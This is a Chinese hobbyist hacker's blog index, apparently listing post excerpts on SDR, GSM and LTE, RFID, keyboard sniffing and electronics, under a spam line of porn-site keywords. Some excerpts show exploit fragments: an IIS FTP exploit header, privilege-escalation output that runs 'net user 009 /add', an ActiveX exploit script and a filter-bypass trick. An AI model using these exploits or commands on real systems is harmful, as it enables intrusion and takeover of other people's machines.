亚洲伊人久久大香线蕉啊 ,亚洲视频在线观看一区,亚洲AV无码男人的天堂

posted @ 2021-11-22 11:32 009 閱讀(1194) | 評論 (0) | 編輯收藏

摘要: srsLTE代碼主要分為三個模塊，即srsUE、srseNB、srsEPC，另外還包括一些底層的庫函數：
srsUE：實現了物理層到IP層的LTE SDR平臺；
srseNB：全協議棧的LTE eNodeB SDR平臺；
srsEPC：輕量級的LTE核心網實現平臺，包括HSS、MME以及S/P-GW；
lib：一套模塊化的通用庫，包括PHY、MAC、RLC、NAS、S1AP以及GW各層。
系統：ubuntu 16.04，使用實體機，USB3.0，千萬不要用虛擬機，一些指令優化，時序。。。需要非常精準，比如雙向驗證鑒權的時候，差一點都不行。
軟件無線電：bladeRF x40，LimeSDR mini，USRP B200
寫卡：買白卡和寫卡器，不要問我，自己關鍵字搜吧，taobao不讓賣了
安裝順序：UHD，SoapySDR，SoapyUHD，LimeSuite，bladeRF，srsGUI，srsLTE
。。。
閱讀全文

posted @ 2019-07-19 12:44 009 閱讀(6904) | 評論 (0) | 編輯收藏

巴厘島四日游

posted @ 2018-11-16 11:33 009 閱讀(370) | 評論 (0) | 編輯收藏

樓上惡鄰小孩奔跑咚咚咚

摘要:
一定會有人用這個關鍵字搜到這里的，
原來沒打算寫，網上搜索時候發現很多人深受苦惱，還是寫一下吧。
背景就不解釋了，此方法為下下策，能用武力解決的就盡量少嗶嗶。
。。。
閱讀全文

posted @ 2016-02-26 14:55 009 閱讀(1160) | 評論 (4) | 編輯收藏

小米手環分析

摘要:
認證很簡單，只需要在FF04的UUID中寫入20字節的值并校驗通過，就可以對手環進行讀寫指令控制。
其實有個更簡單的，只要給Immediate Alert這個屬性發送0x01或者0x02即可啟動“女性娛樂模式”，不需要任何認證：
（這個屬性本來是用來可穿戴設備的找回功能的）
...

閱讀全文

posted @ 2015-09-05 18:34 009 閱讀(3273) | 評論 (12) | 編輯收藏

Sniffing Proprietary 2.4GHz Signals

摘要:
(U) Sniffing Proprietary 2.4GHz Signals
使用HackRF或者RTL-SDR加變頻器，那是極好的，但是我最終需要把所有東西都打包到一個小空間里面。
。。。。。。

閱讀全文

posted @ 2015-05-08 14:12 009 閱讀(2557) | 評論 (0) | 編輯收藏

Promiscuity is the nRF24L01+'s Duty

摘要:
翻譯部分內容，備忘加鞏固，好多不清楚或錯誤的地方，望高手指正。
extending the work of Thorsten Schr?der and Max Moser
of the KeyKeriki v2.0 project.

NHBadge and a Keyboard。。。。。。

閱讀全文

posted @ 2015-04-30 18:29 009 閱讀(1268) | 評論 (0) | 編輯收藏

點繪

摘要:

閱讀全文

posted @ 2015-04-10 16:50 009 閱讀(1049) | 評論 (0) | 編輯收藏

看來我比較適合六歲智商兒童的玩具

摘要:

閱讀全文

posted @ 2014-10-07 09:46 009 閱讀(1495) | 評論 (1) | 編輯收藏

大四軸飛行測試（視頻）

posted @ 2014-06-23 19:14 009 閱讀(1609) | 評論 (2) | 編輯收藏

大四軸飛行器

摘要:
備忘和參考

閱讀全文

posted @ 2014-05-12 16:43 009 閱讀(4887) | 評論 (0) | 編輯收藏

打算做個HackRF

摘要:
國外官方是300美元左右，目前買不到，國內有做的，賣2800人民幣，買不起。只能自己做了，好幾個芯片好貴啊，都上百了。

閱讀全文

posted @ 2014-03-31 17:52 009 閱讀(17273) | 評論 (18) | 編輯收藏

crazyflie組裝

摘要:

閱讀全文

posted @ 2014-03-12 11:16 009 閱讀(3587) | 評論 (7) | 編輯收藏

使用xgoldmon項目調試監控本機通信

摘要:
支持手機（感覺可以把手機設置成MODEM模式支持AT命令的應該都可以）
- Samsung Galaxy S3 GT-I9300
- Samsung Galaxy Nexus GT-I9250 (has to be rooted!)
- Samsung Galaxy S2 GT-I9100
- Samsung Galaxy Note 2 GT-N7100
。。。。。。
閱讀全文

posted @ 2014-03-11 19:02 009 閱讀(3565) | 評論 (0) | 編輯收藏

OsmocomBB項目

摘要:
之前看過好多大牛玩osmocomBB項目，改個手機，連電腦，然后編譯一堆東西，到最后都是開個console，滿屏紅紅綠綠的文字滾動，看著很吊。
但都不說最終能干啥，滾屏完了就沒了，大牛都太低調了，最近有朋友也在搞這個，了解了一下，以下描述都是我最近查閱的大量鳥文資料及少量中文資料之后的理解，如有誤望指出。
OsmocomBB是國外一個開源項目，是GSM協議棧(Protocols stack)的開源實現，全稱是Open source mobile communication Baseband.目的是要實現手機端從物理層(layer1)到layer3的三層實現。
這里記錄一下過程，以便備忘和其它有需要的童鞋少走彎路。
........

閱讀全文

posted @ 2013-11-13 16:27 009 閱讀(52187) | 評論 (118) | 編輯收藏

Galaxy Nexus I9250音量鍵飛線

摘要:
前段時間拆我的三星I9250，把音量排線弄斷了，由于幾乎看不到觸點，修修補補好幾個月了，時好時壞，有時候volume+或者volume-被粘滯住了，就無法開機了，重啟直接進入recovery模式或者安全模式，但是之后無法響應任何鍵進入系統，還是得想辦法徹底地修一下。。。。
閱讀全文

posted @ 2013-11-10 14:16 009 閱讀(2222) | 評論 (4) | 編輯收藏

NodeJS、JavaScript 和 PHP 實現TOTP算法（Google Authenticator）

posted @ 2013-09-11 17:23 009 閱讀(8144) | 評論 (3) | 編輯收藏

ubuntu mysql5.5 更改數據目錄

posted @ 2013-06-14 12:31 009 閱讀(3445) | 評論 (0) | 編輯收藏

MSSQL 2008 日志分析

posted @ 2013-05-03 10:17 009 閱讀(3270) | 評論 (1) | 編輯收藏

清明時節雨紛紛

摘要:

這小子，始終菊花跟臉同時對著我，算你狠。。。

。。。閱讀全文

posted @ 2013-04-07 17:19 009 閱讀(1410) | 評論 (0) | 編輯收藏

Raspberry Pi 增加TFT顯示

摘要:
Raspberry Pi是一款基于Linux系統的個人電腦，配備一枚700MHz的處理器，256內存，支持SD卡和Ethernet，擁有兩個USB接口，以及 HDMI和RCA輸出支持。
有消息稱，雖然Raspberry Pi看起來非常的迷你——只有一張信用卡大小，但是它能夠運行像《雷神之錘三：競技場》這樣的游戲和進行1080p視頻的播放。但是以這次接TFT屏試用結果看，我覺得至少SPI是純屬扯J8蛋，可能HDMI速度快點，但是就以那編譯內核的速度來看，并不樂觀。

... ...
閱讀全文

posted @ 2012-12-18 15:21 009 閱讀(13331) | 評論 (8) | 編輯收藏

曬圖（45幅）

摘要:
統一曬一下最近的圖，時間先后順序亂的

。。。。。。

閱讀全文

posted @ 2012-11-26 17:54 009 閱讀(1833) | 評論 (1) | 編輯收藏

TVB-Gone 紅外編碼方法（每次都重新推算一遍，年紀大了還是記錄一下吧）

摘要:
每次都重新推算一遍，年紀大了還是記錄一下吧（硬件版的TV-B-Gone的壓縮編碼跳過此段往下看）

N900上有個TVB-Gone的程序，但是程序的紅外編碼往往都是對應的國外的電視，好多國產電視都不支持，
有時候需要遙控空調或者投影之類的，只能自己錄入了，大概看了一下，編碼比較簡單（比硬件那個簡單多了，畢竟不需要考慮程序空間的問題）
（上次錄過一次，這次又重搞一遍，還是記錄一下，以備后用。）
。。。
閱讀全文

posted @ 2012-10-23 17:38 009 閱讀(2634) | 評論 (5) | 編輯收藏

Raspberry Pi 入手安裝配置（有圖有真相）

摘要:
托rock的福，跟風敗了個Raspberry Pi，（破手機照的，還可以吧 ^_^），安裝配置如下：
閱讀全文

posted @ 2012-08-10 16:21 009 閱讀(14987) | 評論 (5) | 編輯收藏

Arduino版【流光溢彩】

摘要: 效果看視頻閱讀全文

posted @ 2012-07-13 16:22 009 閱讀(3559) | 評論 (7) | 編輯收藏

我是007加密后的軟件密碼破解

摘要:
最近要破解一個軟件的密碼，發現用的我是007加密的，沒錯，軟件就叫尼瑪我是007，總結下方法：
……

閱讀全文

posted @ 2012-05-31 13:07 009 閱讀(4535) | 評論 (13) | 編輯收藏

畫的喬布斯，能看出來不？

posted @ 2012-05-26 17:55 009 閱讀(1560) | 評論 (2) | 編輯收藏

BT5安裝使用touchatag命令備忘

posted @ 2012-04-26 13:25 009 閱讀(1767) | 評論 (0) | 編輯收藏

用量產的優盤完美硬盤安裝BT5

摘要:
1、The installer needs to commit changes to partition tables, but cannot do so because partitions on the following mount points could not be unmounted: /cdrom
2、ubuntu installer crashed Missing filesystem.size

閱讀全文

posted @ 2012-03-21 13:55 009 閱讀(2797) | 評論 (1) | 編輯收藏

學做了個USB名片

摘要:
半夜三更發blog，沒人疼啊。
打算做個模擬USB鍵盤的東東，半夜睡不著，先搭個USB名片試試，效果還挺好的，可以整些惡作劇，多做幾個可以送人，哈哈。
找現有的零件在面包板上測試的，所以不要評價外觀：）
……
閱讀全文

posted @ 2011-12-10 01:28 009 閱讀(3435) | 評論 (1) | 編輯收藏

2.4GHz無線鍵盤監聽（增加injecting）

摘要:
之前做了個27MHz的無線鍵盤監聽，廢了不少勁，一直想做個2.4GHz的，
國內買元器件和做PCB板子太麻煩，少了不做，又貴，中發電子城又遠，懶得跑，每次跑一趟，總有忘了買的，
拖拖拉拉的一直到最近才終于折騰完。
Cortex-M3的資料很少，Jlink調試還不太會搞，不知道是不是那個山寨的Jlink問題。
……
閱讀全文

posted @ 2011-12-02 15:49 009 閱讀(5009) | 評論 (10) | 編輯收藏

腐蝕了個Punisher裝飾下板子

摘要:
手工畫的，打印的效果肯定會更好……
閱讀全文

posted @ 2011-12-02 15:20 009 閱讀(2447) | 評論 (0) | 編輯收藏

ID卡模擬器（送朋友的禮物）

posted @ 2011-11-06 22:45 009 閱讀(9349) | 評論 (13) | 編輯收藏

曬曬最近添置的東東

posted @ 2011-11-06 18:22 009 閱讀(2322) | 評論 (4) | 編輯收藏

MifareClassicDefaultKeys

posted @ 2011-10-09 16:30 009 閱讀(2201) | 評論 (0) | 編輯收藏

低頻線圈終于弄好了

摘要:
中發的賣家真黑啊，15一個，我是懶得淘寶買，要了兩個，JS肯定背地里竊喜。
用了一個半，接到一起，效果還不錯。
嚴重感謝明月松溪的耐心指導，
嚴禁評價線圈外觀
閱讀全文

posted @ 2011-10-03 18:55 009 閱讀(2553) | 評論 (3) | 編輯收藏

TVBGone

摘要: 芯片買了二批，都是壞的，都開始懷疑我對AVR的理解，甚至重買了個編程器，第三批芯片終于是好的。
結論是國內好多芯片都是假的，悲催啊
……
閱讀全文

posted @ 2011-07-30 21:42 009 閱讀(2421) | 評論 (6) | 編輯收藏

神卡到了，你丫小心點。

posted @ 2011-07-04 17:23 009 閱讀(3540) | 評論 (2) | 編輯收藏

無線鍵盤監聽（更新 LCD 1602）

摘要:
一個國外的開源項目，通過截獲無線鍵盤發出的信號，來監聽鍵盤按鍵操作，第一個版本支持監聽27MHz的無線鍵盤，第二個版本支持2.4G的無線鍵盤監聽及注入功能，爽。

以前玩過C51單片機，加上本身自學能力和手工焊接功底不錯，磕磕絆絆幾個月下來，終于初步完成了這個小玩意。

這次的芯片是ATMEL的MEGA64A，比之前C51系列的又強大、復雜了不少，制作過程中遇到非常多的問題，在這里鄙視一下（強烈地）國內的知識共享精神

…………

閱讀全文

posted @ 2011-02-19 02:40 009 閱讀(6368) | 評論 (15) | 編輯收藏

Nokia N900上安裝Neopwn

摘要:
Neopwn：
http://www.neopwn.com/
BackTrack Mobile版，再解釋一下，相當于一個黑客工具集的手機版，裝完才發現，其實主要用到的就wl1251，一個支持注入的網卡驅動，其它的很多功能都是空的，或者不好用，穩定性不好，建議
……

閱讀全文

posted @ 2010-11-19 14:38 009 閱讀(7310) | 評論 (6) | 編輯收藏

摘要:
......
轉眼過去多年時間多少離合悲歡
曾經志在四方少年羨慕南飛的燕
各自奔前程的身影匆匆漸行漸遠
未來在哪里平凡啊誰給我答案
那時陪伴我的人啊你們如今在何方
我曾經愛過的人啊現在是什么模樣
......

閱讀全文

posted @ 2010-11-18 13:32 009 閱讀(3265) | 評論 (0) | 編輯收藏

DIY一個山寨投影

摘要:
用相機和手機拍的，幾張白天拍的，幾張晚上拍的，開始分辨率不對，調了下好多了，照片效果一般，實際效果比圖片好很多。
……

閱讀全文

posted @ 2010-06-15 11:34 009 閱讀(3899) | 評論 (7) | 編輯收藏

遭受 MSN D.o.S

posted @ 2010-06-14 22:45 009 閱讀(3543) | 評論 (3) | 編輯收藏

關于115網盤提示“網絡繁忙時段，非登陸用戶其它下載地址暫時關閉。。。”解決方法。

摘要:

有時候下載115網盤的時候會提示“網絡繁忙時段，非登陸用戶其它下載地址暫時關閉。推薦您使用優蛋下載，沒有優蛋？立即下載 ”
其實稍微修改下就可以解決。
……

閱讀全文

posted @ 2010-05-19 11:17 009 閱讀(8237) | 評論 (0) | 編輯收藏

掏了個Nokia N900

posted @ 2010-03-31 11:52 009 閱讀(2943) | 評論 (4) | 編輯收藏

解決用Kmplayer播放視頻有明顯馬賽克、鋸齒

摘要:
重裝了N遍驅動，N遍Kmplayer，包括不同版本的，完美解碼等，調試了無數回解碼器，渲染器，分離器什么的，還是沒有解決
最終發現是......

閱讀全文

posted @ 2010-02-06 22:18 009 閱讀(10262) | 評論 (1) | 編輯收藏

去年做的東西

摘要:
主要工具：烙鐵、鉗子、鉛筆刀（廢了至少6把）、AB膠（至少2對）、砂紙、微型螺絲刀
主要材料：鉛筆×112支（六邊形最便宜那種）、棉簽棍若干、烤肉簽×1根、太陽能板、光控電路（廢了一個）
附屬工具：酌情購買創口帖（以本人神乎其技的刀hua也用了兩三個，殘念）
用時：沒有好工具，而且空余時間構思加制作，花了4個月多點，之后零零散散做了些加工。
另：中間順便去了趟喬家大院 & 平遙古城找找感覺

工具條件比較簡陋，削斜面，切斷之類都是用的鉛筆刀，食指一側都長繭了。
..........

閱讀全文

posted @ 2010-01-01 23:15 009 閱讀(3641) | 評論 (9) | 編輯收藏

風訊所有版本多個目錄相關漏洞

posted @ 2009-11-11 23:43 009 閱讀(1659) | 評論 (0) | 編輯收藏

小車

posted @ 2009-10-26 16:39 009 閱讀(4516) | 評論 (3) | 編輯收藏

T60手工添加WWAN模塊上3G和GPS

摘要:
硬件需求：MC5725、小耳朵（天線）、EVDO資費卡、AN/AAA碼、IMSI碼
軟件需求：T60BIOS2.22mod-1802 1804.iso、MC5725驅動、CDMA_Workshop_v2.7.rar、EVDO.prl、QPST_v2.7.rar、EVDO_Watcher.exe

WCDMA太貴，不考慮，移動的還早，現在比較流行的就是電信的EVDO，所以選定MC5725模塊，而且還能GPS，由于國外都沒有中國的機卡分離之說，所以需要把UIM卡的信息刷到模塊上面，這個信息就是AN/AAA碼和IMSI碼，需要電信的內部人員提供，網上有些賣家能提供，不過現在好像越來越嚴了，估計以后很難拿到這些了。
如果需要發短信等普通手機功能，需要刷ESN碼，還有鑒權什么的需要刷AKey，如果只是上3G，只要AN/AAA碼和IMSI碼即可。

以上是這幾天翻閱海量帖子之后就我的理解，如有誤人子弟的地方請指正。

拆機，安裝硬件（之前換過不下5次液晶屏的燈管，此等級的拆機裝機不費吹灰之力）
... 閱讀全文

posted @ 2009-10-17 21:15 009 閱讀(9440) | 評論 (2) | 編輯收藏

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版

摘要:
綁定4444端口，Windows 2000 CN + SP4 測試通過，需要能建目錄的用戶，偏移地址若不通用，請自行修改。
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
..................

閱讀全文

posted @ 2009-09-20 15:09 009 閱讀(4516) | 評論 (0) | 編輯收藏

TRS （文本檢索系統）注入

摘要:
TRS 是英文Text Retrieval System（文本檢索系統）的縮寫，據說是全文檢索、搜索引擎、內容管理及知識管理核心技術和產品的統一，入選2008年度國家規劃布局內重點軟件企業，做某些滲透經常會碰到。
......

閱讀全文

posted @ 2009-09-10 15:12 009 閱讀(1335) | 評論 (0) | 編輯收藏

Overwrite $_FILE array in rfc1867 - Mime multipart/form-data File Upload

摘要:
鳥文沒太看明白，摸索了一下，$_FILE數組元素解析的問題。
搭個php的環境，目錄在C:\www下，根目錄下有個upload.php代碼如下
......

閱讀全文

posted @ 2009-07-27 11:54 009 閱讀(3472) | 評論 (4) | 編輯收藏

機場無線密碼(更新20100627)

摘要:
更新頻度視出差頻度而定
上海虹橋機場
京滬空中快線A8登機口
cheerway snack bar A8/.............

閱讀全文

posted @ 2009-04-09 11:34 009 閱讀(7937) | 評論 (5) | 編輯收藏

黑客控制整棟大廈電力系統,改編成游戲!

摘要:
這才是牛逼黑客,控制整棟大廈電力系統,大廈燈光來做背景,改編成游戲!坦克大戰~~
.............

閱讀全文

posted @ 2009-02-06 23:57 009 閱讀(5779) | 評論 (6) | 編輯收藏

以色列人發現的IE 0day (ZT)

摘要:
測試成功，點打印后，會彈出計算器
.........
閱讀全文

posted @ 2009-01-08 19:16 009 閱讀(4456) | 評論 (8) | 編輯收藏

模擬鋼琴

摘要:
26個字母，26個鋼琴鍵(鍵盤請在關閉漢字輸入法然后點下上面的FLASH以獲得焦點，才可正常使用)，可以用a-z來彈，也可以用鼠標
下面的音樂，彈出來就知道是什么了
.........

閱讀全文

posted @ 2008-12-05 12:14 009 閱讀(4579) | 評論 (2) | 編輯收藏

把我的W810C刷了一下，增加了些實用功能

摘要:
反正很老的機子了，刷壞了大不了買個新的
增加了如下功能：
1. 去網標，那個CMCC
2. 拍照可靜音，上次上課拍老師的投影，安靜的課堂上，咔嚓咔嚓很尷尬
3. 更新聲音和攝像的驅動
4. 增加歌詞秀功能（這個是我迫切需要的功能）
5. 增加來電秀功能（來電或者去電，顯示對方的物理地址）
6. 字體變小，看著舒服一點
7. 比較酷的主題
8. 改walkman界面
9. 修改休眠模式顯示時間的字體
10. 長按側面的＋按鈕，開啟或者關閉照明燈
11. 還有GPS功能，不實用，只顯示兩個十六進制字符串，冒號分割，不知道什么意思，難道是經度緯度？
12. 應該還有，忘了
下面看圖
....................

閱讀全文

posted @ 2008-10-30 22:52 009 閱讀(4724) | 評論 (12) | 編輯收藏

繞過命令行下過濾反斜杠\

摘要:
%tmp:~2,1%
稍微看了下，原來這個字符串是這個意思：%tmp:~2,1% = mid(%tmp%,2,1) = \
......

閱讀全文

posted @ 2008-10-16 14:39 009 閱讀(3463) | 評論 (0) | 編輯收藏

曬圖

摘要:
某些地方畫得有出入，被人一通鄙視
歡總一語道破：觀察太少了
...........
閱讀全文

posted @ 2008-10-14 00:23 009 閱讀(2519) | 評論 (3) | 編輯收藏

Token Kidnapping Windows 2003 PoC exploit (Win2K3測試成功)

摘要:
我的有啥補丁打啥補丁的Win2k3 CN SP1測試成功

d:\Churrasco.exe "net user 009 /add"

/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
.......

閱讀全文

posted @ 2008-10-09 10:52 009 閱讀(7324) | 評論 (13) | 編輯收藏

曬圖

摘要:
左腿的陰影還行，云不會畫

閱讀全文

posted @ 2008-10-03 19:39 009 閱讀(2075) | 評論 (1) | 編輯收藏

回答“我的電腦最近很慢”“老是彈出網頁”之類的問題專用帖

摘要:
“我的電腦黑屏了”
“我的電腦最近不知怎么變得很慢？“
“我上網老是自動彈出頁面，怎么回事？”
“為什么殺毒軟件老是彈出來，每次都是同一個病毒？”
.....................
任何人，我一般都會幫忙，但是長時間停留在這個問題上，會瘋掉的，往往對方的描述不一定精確，光靠說，白白花了一天的時間也有可能搞不定一個小問題
也許有兩種情況我會耐心的給你分析，1：領導，2：美女
我一般會說：“造成這種情況有149834種可能，重裝吧，裝完升級系統，打補丁，裝殺毒，升級病毒庫，不要裝垃圾軟件，不要上色情網站。”
下面講講一般步驟，以下講的都是對付普通病毒，如果說驅動級，rootkit，bootkit什么的，要想讓我用一篇簡單的blog描述清楚恐怕不太現實，讓你清理注入線程，SSDT之類的惡意程序就夠你受的了。
................
閱讀全文

posted @ 2008-09-21 21:46 009 閱讀(3249) | 評論 (6) | 編輯收藏

COVER

摘要:

閱讀全文

posted @ 2008-09-19 00:25 009 閱讀(2245) | 評論 (1) | 編輯收藏

阿爾山（六）

摘要:
多圖
閱讀全文

posted @ 2008-09-19 00:04 009 閱讀(2095) | 評論 (4) | 編輯收藏

阿爾山（四）

摘要:
多圖
閱讀全文

posted @ 2008-09-19 00:03 009 閱讀(1923) | 評論 (3) | 編輯收藏

阿爾山（五）

摘要:
多圖

閱讀全文

posted @ 2008-09-19 00:03 009 閱讀(1887) | 評論 (1) | 編輯收藏

阿爾山（三）

摘要:
多圖
閱讀全文

posted @ 2008-09-19 00:02 009 閱讀(1824) | 評論 (1) | 編輯收藏

阿爾山（二）

摘要:
多圖閱讀全文

posted @ 2008-09-19 00:01 009 閱讀(1812) | 評論 (0) | 編輯收藏

阿爾山（一）

摘要:
080913 北京－八達嶺高速－張家口－張北－寶昌鎮（太仆寺旗）－桑根達來鎮－烏日圖塔拉蘇木－錫林浩特－巴彥寶拉格蘇木－阿爾善寶拉格鎮－額和寶拉格蘇木－烏里亞斯太鎮（東烏珠穆沁旗）
080914 烏里亞斯太鎮（東烏珠穆沁旗）－寶拉格蘇木－巴彥霍布爾－額仁高畢蘇木－滿都胡寶拉格蘇木－寶格達山林場－五岔溝鎮－白狼鎮－阿爾山市
080914 阿爾山游玩一天
080915 阿爾山－白狼鎮－五岔溝鎮－好仁蘇木－科爾沁右翼前旗－突泉鎮－科爾沁右翼中旗－高力板鎮－舍伯吐鎮－通遼－赤峰市
080916 赤峰市－承德市－北京

PS了一下，主要調了下顏色對比度等，裁剪了下尺寸，因為有的在車上拍的，畫面中會有反光鏡：），還有鏡頭上的水珠或者擋風玻璃上的蟲子什么的，盡量PS掉了一些
..........
閱讀全文

posted @ 2008-09-18 22:11 009 閱讀(1303) | 評論 (0) | 編輯收藏

瞧瞧這智商

posted @ 2008-09-11 00:58 009 閱讀(2739) | 評論 (3) | 編輯收藏

ubuntu 6.10升級到8.10

摘要:
寫在文章開頭的話：抑郁癥嚴重者，切勿嘗試以下操作

不要被標題誤導了，不是直接一步升完，其實還是從6.10升到7.04再升7.10再升8.04再升8.10，相當漫長
(堅持6.10很久了，由于之前beryl特效是自己配置安裝的，巨麻煩，一直舍不得升級)
.....................

閱讀全文

posted @ 2008-08-22 13:15 009 閱讀(1177) | 評論 (2) | 編輯收藏

近距離接觸奧運（多圖殺貓）

摘要:
早上馬拉松在家門口經過，下午去五棵松看女籃
十倍光學變焦，不是蓋的，不過別人已經單反了
............

閱讀全文

posted @ 2008-08-17 23:30 009 閱讀(1894) | 評論 (2) | 編輯收藏

用自己的聲音唱歌或哼唱來搜索音樂

摘要:
http://www.midomi.com/，首頁點上面的flash，Click and Sing or Hum
害我半夜翻箱倒柜找麥狼嚎，不過我唱的搜出來從來沒對過，我確定是這套系統的識別率有問題，沒錯，確定一定以及肯定。
.........
閱讀全文

posted @ 2008-08-15 22:44 009 閱讀(4314) | 評論 (3) | 編輯收藏

曬圖

摘要:

閱讀全文

posted @ 2008-08-15 21:45 009 閱讀(1929) | 評論 (2) | 編輯收藏

WordPress暴絕對路徑

摘要:
(之前發的"關于Fs2You怎么才能不被和諧"的文章被和諧掉了)
裝WordPress順便看到的
默認plugins目錄有hello.php文件，不過好像很多插........

閱讀全文

posted @ 2008-08-12 14:46 009 閱讀(2447) | 評論 (2) | 編輯收藏

在辦公室等簽字無聊畫的

posted @ 2008-08-05 18:09 009 閱讀(2404) | 評論 (3) | 編輯收藏

8要香菜

摘要:
最近奧運了，地鐵口變少了，開車單雙號了，馬路變窄了，物價上漲了，斷奶一個禮拜了，股票下跌了，失業率上升了，社會動蕩了，公司加班了，獎金不發了，關鍵是連燴面片都TMD開始放香菜了！
.........
閱讀全文

posted @ 2008-07-28 00:08 009 閱讀(1447) | 評論 (0) | 編輯收藏

我最帥的白襯衫終于掛了

posted @ 2008-07-23 00:35 009 閱讀(2402) | 評論 (9) | 編輯收藏

ChinaJOY最后一天（多圖殺貓）

摘要:
多圖殺貓
... ...

閱讀全文

posted @ 2008-07-19 19:31 009 閱讀(2284) | 評論 (0) | 編輯收藏

Microsoft Office Snapshot Viewer ActiveX Exploit (可執行版)

摘要:
lcx給的，網上的都是放啟動項，這個可以自動執行

<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
.........
閱讀全文

posted @ 2008-07-14 23:07 009 閱讀(2540) | 評論 (3) | 編輯收藏

喬家大院 & 平遙古城（多貓殺圖）

摘要:
多貓殺圖，務必小心
....

閱讀全文

posted @ 2008-07-03 15:48 009 閱讀(1702) | 評論 (0) | 編輯收藏

Kugoo2008的歌詞功能效果灰常不錯，適合“跑調王”（圖）

摘要:
今天找首歌，用kugoo，幾百年不用，賬號還在，提示自動升級，升完有個歌詞的功能灰常不錯，不像以前的歌詞秀那種平均時間分配的顯示歌詞，而是類似卡拉OK的顯示歌詞方式，比較適合跑調王。不是非常精確，不過已經不錯了。
一直用foobar，目前似乎還沒有對應的插件。
......

閱讀全文

posted @ 2008-06-14 23:07 009 閱讀(2516) | 評論 (1) | 編輯收藏

PSP《合金裝備：掌上行動》漢化版發布 (ZT)

摘要:
PS: 實在太經典，不得不轉一下
獻給所有的MGSER和游戲愛好者：

不論是作為psp平臺上目前fami通評分最高的游戲（39分）來看，還是從完美承接了MGS3的劇情來看，合金裝備-掌上行動都是一款不可多得的優秀作品。在曠世神作合金裝備4即將發售之際，提前領略一下這個系列無與倫比的劇情魅力，也是我們獻給每一個熱愛該系列的玩家們小小禮物。
..............

閱讀全文

posted @ 2008-06-07 11:13 009 閱讀(3287) | 評論 (3) | 編輯收藏

flash 9,0,115,0 exp (ZT)

摘要: 未測試，覺得比較雞肋，能中的人實在太少了

閱讀全文

posted @ 2008-05-30 11:26 009 閱讀(1486) | 評論 (1) | 編輯收藏

別害怕，我就站在你身邊！

摘要:
昨晚在吃飯的地方看了將近3小時電視（幾乎不看電視，家里沒電視），震憾，感人
太多太多太多感人的事跡，看著一幕幕畫面，真有自己過去搬石頭，幫忙出力的沖動，人家72小時不休息，大不了我48小時應該沒問題，或者給人送個水什么的，能做什么就做什么。
給朋友打了個電話.......

閱讀全文

posted @ 2008-05-16 13:57 009 閱讀(2368) | 評論 (0) | 編輯收藏

國外強人改造系列之紅白機NES便攜化V3.0

摘要:
NESP第一個版本成功后，我就開始著手更加袖珍版本的改造，讓我的NESP更容易攜帶。對于V3版本，我首先需要的是一塊能夠順利運行NES游戲的主版NOAC，對比之前的版本，它的耗電量會更小。當然我不會保證所有NES游戲都能100%兼容，估計會有小部分NES游戲不能運行吧。
.......
閱讀全文

posted @ 2008-05-15 12:13 009 閱讀(1365) | 評論 (0) | 編輯收藏

國外強人改造系列之紅白機NES便攜化V1.2&2.0

摘要:
經過1個多月的使用時間，第一版本的NESP的缺陷就開始體現出來了。內部的一些保護油脂在我需要更換之前就失去作用了，還有其他的措施也沒有起到預計的作用，主板最終還是被我的手汗侵蝕了。要是這種情況繼續下去的話，按鍵部分的電路會徹底報銷的。
............
閱讀全文

posted @ 2008-05-15 12:10 009 閱讀(1138) | 評論 (0) | 編輯收藏

國外強人改造系列之紅白機NES便攜化V1.0

摘要:
在一個黑暗的風雨交加之夜，一名瘋狂的技師正操控著一臺巨大的裝置。他的手中拿著長長的木條，并等待適當的時機進行加工，工作間因為外面狂怒的閃電而充滿白色的光芒。閃電再三擊中建筑物，在被電弧纏繞的房間中，瘋狂技師露出了魔鬼般的笑容。實驗終于完結，把所有裝置移除后，展現在我們面前的是：一個屏幕閃動著藍光的盒子。
...............
閱讀全文

posted @ 2008-05-15 11:32 009 閱讀(1463) | 評論 (0) | 編輯收藏

改了個linux下的c代碼為windows版本

摘要:
Windows的C++沒有pthread_t類型，linux中有個pthread.h，很多站的VC代碼，都不知道從哪包含來的，shit
網上看到有一個叫 POSIX Threads for Win32 的開源項目給出了一個功能比較完善的Windows下pthreads API的實現。

閱讀全文

posted @ 2008-05-09 14:51 009 閱讀(2795) | 評論 (4) | 編輯收藏

將Win32 C/C++應用程序遷移到Linux-進程、線程和共享內存（ZT）

摘要:
本文的內容是 Win32 API（特別是進程、線程和共享內存服務）到 POWER 上 Linux 的映射。本文可以幫助您確定哪種映射服務最適合您的需要。作者向您詳細介紹了他在移植 Win32 C/C++ 應用程序時遇到的 API 映射。

閱讀全文

posted @ 2008-05-09 14:33 009 閱讀(3717) | 評論 (0) | 編輯收藏

內蒙最后一天

摘要:
剛去離我住的地方方圓二里地內最好的飯館吃飯（叫音樂餐廳，這里所謂最好的是指：一個人吃飯價錢還能承受，味道可以，而且吃完還不會拉肚子），晚飯吃得早了點，因為晚上的火車，里面一個人都沒有，除了服務員。坐下一四人小桌，服務員過來撤走三套餐具，留下一套離我最遠的，在我對角的餐具，點了兩個菜一個炒飯，
........
閱讀全文

posted @ 2008-05-08 18:48 009 閱讀(496) | 評論 (1) | 編輯收藏

MS08-025 for win2k & win2k3

摘要: Win2k CN SP2 ，Win2k3 CN SP1下測試通過，其它未測試(不裝XP那種垃圾)
D:\>ms08025 whoami

MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1

Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmCo 閱讀全文

posted @ 2008-04-17 23:43 009 閱讀(2612) | 評論 (7) | 編輯收藏

Firefox自定義referer插件（Firefox突破防盜鏈）

摘要:
RefControl 0.8.10

要是上次找到這個插件就好了，省得我一遍一遍地用nc修改referer提交
很多防盜鏈和防本地提交是依靠用戶瀏覽器自動提交.......

閱讀全文

posted @ 2008-04-08 14:42 009 閱讀(6241) | 評論 (1) | 編輯收藏

Firefox突破圖片防盜鏈

